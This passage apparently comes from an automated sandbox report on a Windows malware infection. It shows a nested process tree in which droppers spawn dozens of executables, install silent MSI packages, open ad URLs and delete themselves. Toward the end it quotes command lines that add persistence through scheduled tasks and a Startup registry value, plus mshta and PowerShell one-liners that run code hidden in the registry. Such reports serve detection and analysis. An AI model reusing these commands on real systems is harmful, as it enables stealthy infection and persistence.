                                                        • Modifies Internet Explorer settings
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:4932
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 1424
                                                          12⤵
                                                          • Program crash
                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                          PID:4960
                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4848 CREDAT:1389587 /prefetch:2
                                                        11⤵
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2232
                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4848 CREDAT:1520659 /prefetch:2
                                                        11⤵
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:3328
                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4848 CREDAT:1258517 /prefetch:2
                                                        11⤵
                                                          PID:1716
                                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4848 CREDAT:1193021 /prefetch:2
                                                          11⤵
                                                            PID:3880
                                                        • C:\Program Files\Internet Explorer\iexplore.exe
                                                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                          10⤵
                                                            PID:4972
                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                            "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
                                                            10⤵
                                                              PID:4832
                                                            • C:\Program Files\Internet Explorer\iexplore.exe
                                                              "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513
                                                              10⤵
                                                                PID:4264
                                                            • C:\Users\Admin\AppData\Local\Temp\b1-f5812-ac4-e3a88-4a080b8d78730\Cikaqeluzha.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\b1-f5812-ac4-e3a88-4a080b8d78730\Cikaqeluzha.exe"
                                                              9⤵
                                                                PID:3192
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\apsqb3ba.0e0\GcleanerEU.exe /eufive & exit
                                                                  10⤵
                                                                    PID:2260
                                                                    • C:\Users\Admin\AppData\Local\Temp\apsqb3ba.0e0\GcleanerEU.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\apsqb3ba.0e0\GcleanerEU.exe /eufive
                                                                      11⤵
                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                      PID:3860
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\apsqb3ba.0e0\GcleanerEU.exe" & exit
                                                                        12⤵
                                                                          PID:4468
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /im "GcleanerEU.exe" /f
                                                                            13⤵
                                                                            • Kills process with taskkill
                                                                            PID:5024
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4dmc4xit.4ls\installer.exe /qn CAMPAIGN="654" & exit
                                                                      10⤵
                                                                        PID:3488
                                                                        • C:\Users\Admin\AppData\Local\Temp\4dmc4xit.4ls\installer.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\4dmc4xit.4ls\installer.exe /qn CAMPAIGN="654"
                                                                          11⤵
                                                                          • Enumerates connected drives
                                                                          • Modifies system certificate store
                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:4776
                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4dmc4xit.4ls\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\4dmc4xit.4ls\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629279850 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                            12⤵
                                                                              PID:4696
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l0jomg5j.dkh\ufgaa.exe & exit
                                                                          10⤵
                                                                            PID:1596
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\23ct0sva.ab1\anyname.exe & exit
                                                                            10⤵
                                                                              PID:3164
                                                                              • C:\Users\Admin\AppData\Local\Temp\23ct0sva.ab1\anyname.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\23ct0sva.ab1\anyname.exe
                                                                                11⤵
                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                PID:3584
                                                                                • C:\Users\Admin\AppData\Local\Temp\23ct0sva.ab1\anyname.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\23ct0sva.ab1\anyname.exe" -q
                                                                                  12⤵
                                                                                    PID:2136
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vu55emqp.i4n\gcleaner.exe /mixfive & exit
                                                                                10⤵
                                                                                • Blocklisted process makes network request
                                                                                • Modifies system certificate store
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2088
                                                                                • C:\Users\Admin\AppData\Local\Temp\vu55emqp.i4n\gcleaner.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\vu55emqp.i4n\gcleaner.exe /mixfive
                                                                                  11⤵
                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                  PID:4984
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\vu55emqp.i4n\gcleaner.exe" & exit
                                                                                    12⤵
                                                                                      PID:3308
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /im "gcleaner.exe" /f
                                                                                        13⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:2664
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1wxw3s3e.btp\autosubplayer.exe /S & exit
                                                                                  10⤵
                                                                                    PID:4952
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2444
                                                                            • C:\Users\Admin\AppData\Roaming\3950149.exe
                                                                              "C:\Users\Admin\AppData\Roaming\3950149.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:2480
                                                                              • C:\Windows\system32\WerFault.exe
                                                                                C:\Windows\system32\WerFault.exe -u -p 2480 -s 1732
                                                                                8⤵
                                                                                • Program crash
                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                PID:4796
                                                                            • C:\Users\Admin\AppData\Roaming\6005643.exe
                                                                              "C:\Users\Admin\AppData\Roaming\6005643.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious behavior: SetClipboardViewer
                                                                              PID:1940
                                                                            • C:\Users\Admin\AppData\Roaming\6951673.exe
                                                                              "C:\Users\Admin\AppData\Roaming\6951673.exe"
                                                                              7⤵
                                                                                PID:2092
                                                                              • C:\Users\Admin\AppData\Roaming\4041994.exe
                                                                                "C:\Users\Admin\AppData\Roaming\4041994.exe"
                                                                                7⤵
                                                                                  PID:3716
                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:1728
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                  7⤵
                                                                                    PID:2104
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2180
                                                                                  • C:\Users\Admin\AppData\Local\Temp\tmpBB54_tmp.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\tmpBB54_tmp.exe"
                                                                                    7⤵
                                                                                      PID:3292
                                                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                                                        "C:\Windows\System32\dllhost.exe"
                                                                                        8⤵
                                                                                          PID:1568
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                          8⤵
                                                                                            PID:4300
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd
                                                                                              9⤵
                                                                                                PID:2940
                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                  findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                  10⤵
                                                                                                    PID:3184
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                    Esplorarne.exe.com i
                                                                                                    10⤵
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                    PID:4896
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                      11⤵
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                      PID:4684
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                        12⤵
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        PID:4808
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                          13⤵
                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                          PID:2920
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                            14⤵
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                            PID:1732
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                              15⤵
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                              PID:3696
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                16⤵
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                PID:4728
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                  17⤵
                                                                                                                    PID:832
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                      18⤵
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                      PID:3184
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                        19⤵
                                                                                                                          PID:3548
                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                        ping QWOCTUPM -n 30
                                                                                                        10⤵
                                                                                                        • Runs ping.exe
                                                                                                        PID:4224
                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks computer location settings
                                                                                                PID:1180
                                                                                                • C:\Users\Admin\Documents\z1SCikzE80t99Ysa0jcAOKt4.exe
                                                                                                  "C:\Users\Admin\Documents\z1SCikzE80t99Ysa0jcAOKt4.exe"
                                                                                                  7⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:1908
                                                                                                  • C:\Users\Admin\Documents\z1SCikzE80t99Ysa0jcAOKt4.exe
                                                                                                    C:\Users\Admin\Documents\z1SCikzE80t99Ysa0jcAOKt4.exe
                                                                                                    8⤵
                                                                                                      PID:3412
                                                                                                  • C:\Users\Admin\Documents\riCCXePz_ilUvsxD1FPLyadx.exe
                                                                                                    "C:\Users\Admin\Documents\riCCXePz_ilUvsxD1FPLyadx.exe"
                                                                                                    7⤵
                                                                                                      PID:3080
                                                                                                      • C:\Users\Admin\Documents\riCCXePz_ilUvsxD1FPLyadx.exe
                                                                                                        "C:\Users\Admin\Documents\riCCXePz_ilUvsxD1FPLyadx.exe" -q
                                                                                                        8⤵
                                                                                                          PID:2940
                                                                                                      • C:\Users\Admin\Documents\nyFproU3cKrbh88BbFmCBJo_.exe
                                                                                                        "C:\Users\Admin\Documents\nyFproU3cKrbh88BbFmCBJo_.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:2600
                                                                                                      • C:\Users\Admin\Documents\SEtgfGA0x3gGmrHlsWWOQgyl.exe
                                                                                                        "C:\Users\Admin\Documents\SEtgfGA0x3gGmrHlsWWOQgyl.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2016
                                                                                                        • C:\Users\Admin\Documents\SEtgfGA0x3gGmrHlsWWOQgyl.exe
                                                                                                          "C:\Users\Admin\Documents\SEtgfGA0x3gGmrHlsWWOQgyl.exe"
                                                                                                          8⤵
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:2604
                                                                                                      • C:\Users\Admin\Documents\9PKxAXJdHzRHtfbijF8TV5M4.exe
                                                                                                        "C:\Users\Admin\Documents\9PKxAXJdHzRHtfbijF8TV5M4.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:2652
                                                                                                      • C:\Users\Admin\Documents\MccrEjlm8SHr8sONKXNWUTPH.exe
                                                                                                        "C:\Users\Admin\Documents\MccrEjlm8SHr8sONKXNWUTPH.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:1664
                                                                                                        • C:\Users\Admin\Documents\MccrEjlm8SHr8sONKXNWUTPH.exe
                                                                                                          C:\Users\Admin\Documents\MccrEjlm8SHr8sONKXNWUTPH.exe
                                                                                                          8⤵
                                                                                                            PID:1816
                                                                                                        • C:\Users\Admin\Documents\xnDYCnwAr_rAHEwKHLGrcwUw.exe
                                                                                                          "C:\Users\Admin\Documents\xnDYCnwAr_rAHEwKHLGrcwUw.exe"
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:2856
                                                                                                        • C:\Users\Admin\Documents\abZCyTdTDzST3H33q_QllsR0.exe
                                                                                                          "C:\Users\Admin\Documents\abZCyTdTDzST3H33q_QllsR0.exe"
                                                                                                          7⤵
                                                                                                            PID:1868
                                                                                                          • C:\Users\Admin\Documents\Ejda3P3ww4n5iSfIhM5NBlAE.exe
                                                                                                            "C:\Users\Admin\Documents\Ejda3P3ww4n5iSfIhM5NBlAE.exe"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks processor information in registry
                                                                                                            PID:612
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im Ejda3P3ww4n5iSfIhM5NBlAE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\Ejda3P3ww4n5iSfIhM5NBlAE.exe" & del C:\ProgramData\*.dll & exit
                                                                                                              8⤵
                                                                                                                PID:3864
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /im Ejda3P3ww4n5iSfIhM5NBlAE.exe /f
                                                                                                                  9⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:2204
                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                  timeout /t 6
                                                                                                                  9⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:4628
                                                                                                            • C:\Users\Admin\Documents\HkYTBhUD4ZHJINh1wu7D2H5W.exe
                                                                                                              "C:\Users\Admin\Documents\HkYTBhUD4ZHJINh1wu7D2H5W.exe"
                                                                                                              7⤵
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:1688
                                                                                                            • C:\Users\Admin\Documents\yRtbDq7JUBWb81BlvJGS0yLi.exe
                                                                                                              "C:\Users\Admin\Documents\yRtbDq7JUBWb81BlvJGS0yLi.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:2152
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-MN1JC.tmp\yRtbDq7JUBWb81BlvJGS0yLi.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-MN1JC.tmp\yRtbDq7JUBWb81BlvJGS0yLi.tmp" /SL5="$30228,138429,56832,C:\Users\Admin\Documents\yRtbDq7JUBWb81BlvJGS0yLi.exe"
                                                                                                                8⤵
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                PID:2228
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-USPTU.tmp\Setup.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-USPTU.tmp\Setup.exe" /Verysilent
                                                                                                                  9⤵
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  PID:1212
                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                    10⤵
                                                                                                                    • Enumerates connected drives
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    PID:4280
                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629279850 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                      11⤵
                                                                                                                        PID:1920
                                                                                                              • C:\Users\Admin\Documents\ynAALOGPWJe847WnkHJgM7Hl.exe
                                                                                                                "C:\Users\Admin\Documents\ynAALOGPWJe847WnkHJgM7Hl.exe"
                                                                                                                7⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:2384
                                                                                                                • C:\Users\Admin\Documents\ynAALOGPWJe847WnkHJgM7Hl.exe
                                                                                                                  C:\Users\Admin\Documents\ynAALOGPWJe847WnkHJgM7Hl.exe
                                                                                                                  8⤵
                                                                                                                    PID:3980
                                                                                                                • C:\Users\Admin\Documents\MJG3tE65GdwUX_Aa8pRmfxr_.exe
                                                                                                                  "C:\Users\Admin\Documents\MJG3tE65GdwUX_Aa8pRmfxr_.exe"
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:804
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "MJG3tE65GdwUX_Aa8pRmfxr_.exe" /f & erase "C:\Users\Admin\Documents\MJG3tE65GdwUX_Aa8pRmfxr_.exe" & exit
                                                                                                                    8⤵
                                                                                                                      PID:2408
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /im "MJG3tE65GdwUX_Aa8pRmfxr_.exe" /f
                                                                                                                        9⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:3112
                                                                                                                  • C:\Users\Admin\Documents\aXc_x16pByzNegJx9xX1Ezxo.exe
                                                                                                                    "C:\Users\Admin\Documents\aXc_x16pByzNegJx9xX1Ezxo.exe"
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:1756
                                                                                                                  • C:\Users\Admin\Documents\JbK7Xqm3LPB421MjxoMJUsj_.exe
                                                                                                                    "C:\Users\Admin\Documents\JbK7Xqm3LPB421MjxoMJUsj_.exe"
                                                                                                                    7⤵
                                                                                                                      PID:2852
                                                                                                                    • C:\Users\Admin\Documents\Xah2cwFnAKM31lYUstpW5Czx.exe
                                                                                                                      "C:\Users\Admin\Documents\Xah2cwFnAKM31lYUstpW5Czx.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:2392
                                                                                                                    • C:\Users\Admin\Documents\uLtTuy9Gxu7A9XOfolfOVRKX.exe
                                                                                                                      "C:\Users\Admin\Documents\uLtTuy9Gxu7A9XOfolfOVRKX.exe"
                                                                                                                      7⤵
                                                                                                                        PID:1600
                                                                                                                        • C:\Users\Admin\AppData\Roaming\4583903.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\4583903.exe"
                                                                                                                          8⤵
                                                                                                                            PID:2468
                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 2468 -s 1532
                                                                                                                              9⤵
                                                                                                                              • Program crash
                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                              PID:4820
                                                                                                                          • C:\Users\Admin\AppData\Roaming\2478525.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\2478525.exe"
                                                                                                                            8⤵
                                                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                                                            PID:2520
                                                                                                                        • C:\Users\Admin\Documents\v7xcnyCvc5Ju8hUciI9IumfU.exe
                                                                                                                          "C:\Users\Admin\Documents\v7xcnyCvc5Ju8hUciI9IumfU.exe"
                                                                                                                          7⤵
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                          PID:1300
                                                                                                                        • C:\Users\Admin\Documents\RlXCCZFZY1gUh1AbonZaOZzJ.exe
                                                                                                                          "C:\Users\Admin\Documents\RlXCCZFZY1gUh1AbonZaOZzJ.exe"
                                                                                                                          7⤵
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Checks whether UAC is enabled
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          PID:2160
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\84E9.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\84E9.exe
                                                                                                                2⤵
                                                                                                                  PID:4000
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7466.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7466.exe
                                                                                                                  2⤵
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  PID:2764
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\92FE.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\92FE.exe
                                                                                                                  2⤵
                                                                                                                    PID:2248
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                                                      3⤵
                                                                                                                        PID:1736
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                          4⤵
                                                                                                                            PID:3332
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                              5⤵
                                                                                                                                PID:4288
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
                                                                                                                              4⤵
                                                                                                                              • Creates scheduled task(s)
                                                                                                                              PID:1324
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\EDAC.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\EDAC.exe
                                                                                                                          2⤵
                                                                                                                            PID:3108
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Kip7yA21tZ.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Kip7yA21tZ.exe"
                                                                                                                              3⤵
                                                                                                                                PID:4400
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                  4⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:3980
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\O2j5734X1Y.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\O2j5734X1Y.exe"
                                                                                                                                3⤵
                                                                                                                                  PID:5080
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
                                                                                                                                    4⤵
                                                                                                                                      PID:3636
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\EDAC.exe"
                                                                                                                                    3⤵
                                                                                                                                      PID:2732
                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                        timeout /T 10 /NOBREAK
                                                                                                                                        4⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:560
                                                                                                                                  • C:\Windows\System32\mshta.exe
                                                                                                                                    "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Nlnc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nlnc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\4B61E080-2EC6-B557-90AF-42B9C45396FD\\\StopPlay'));if(!window.flag)close()</script>"
                                                                                                                                    2⤵
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    PID:2596
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\4B61E080-2EC6-B557-90AF-42B9C45396FD").SystemOperator))
                                                                                                                                      3⤵
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      PID:384
